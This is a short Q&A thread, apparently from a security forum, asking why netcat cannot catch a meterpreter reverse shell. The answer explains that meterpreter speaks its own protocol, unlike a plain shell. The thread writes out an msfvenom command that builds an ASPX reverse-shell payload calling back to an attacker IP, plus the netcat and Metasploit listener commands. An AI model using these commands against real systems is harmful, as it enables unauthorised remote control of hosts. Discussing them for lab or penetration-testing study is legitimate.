2

For most reverse shell here, I can simply use netcat to connect:

nc -nlvp 1234

But for reverse shell created by msfvenom, for example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx

I CANNOT use netcat to connect.

Instead, use msfconsole to connect:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Question:

Why netcat is NOT working here?

To connect reverse shell created by msfvenom, any other way than metasploit?

TJCLK
  • 818
  • 8
  • 23

1 Answers1

5

Why netcat is NOT working here?

To connect reverse shell created by msfvenom, any other way than metasploit?

That's because you are generating a fully fledged meterpreter payload and using that is extremely different from a simple reverse shell. A simple reverse shell is a just a textual access to the cmd/bash but a fully fledged meterpreter payload contains not just shell access but also all kinds of other commands sending and receiving. In simple terms netcat cannot interact on a text basis with meterpreter. You could use the shell_reverse_tcp payload instead of meterpreter and then receive a connect back to netcat but not with meterpreter/reverse_tcp.

Tobi Nary
  • 14,302
  • 8
  • 43
  • 58
yeah_well
  • 3,699
  • 1
  • 13
  • 30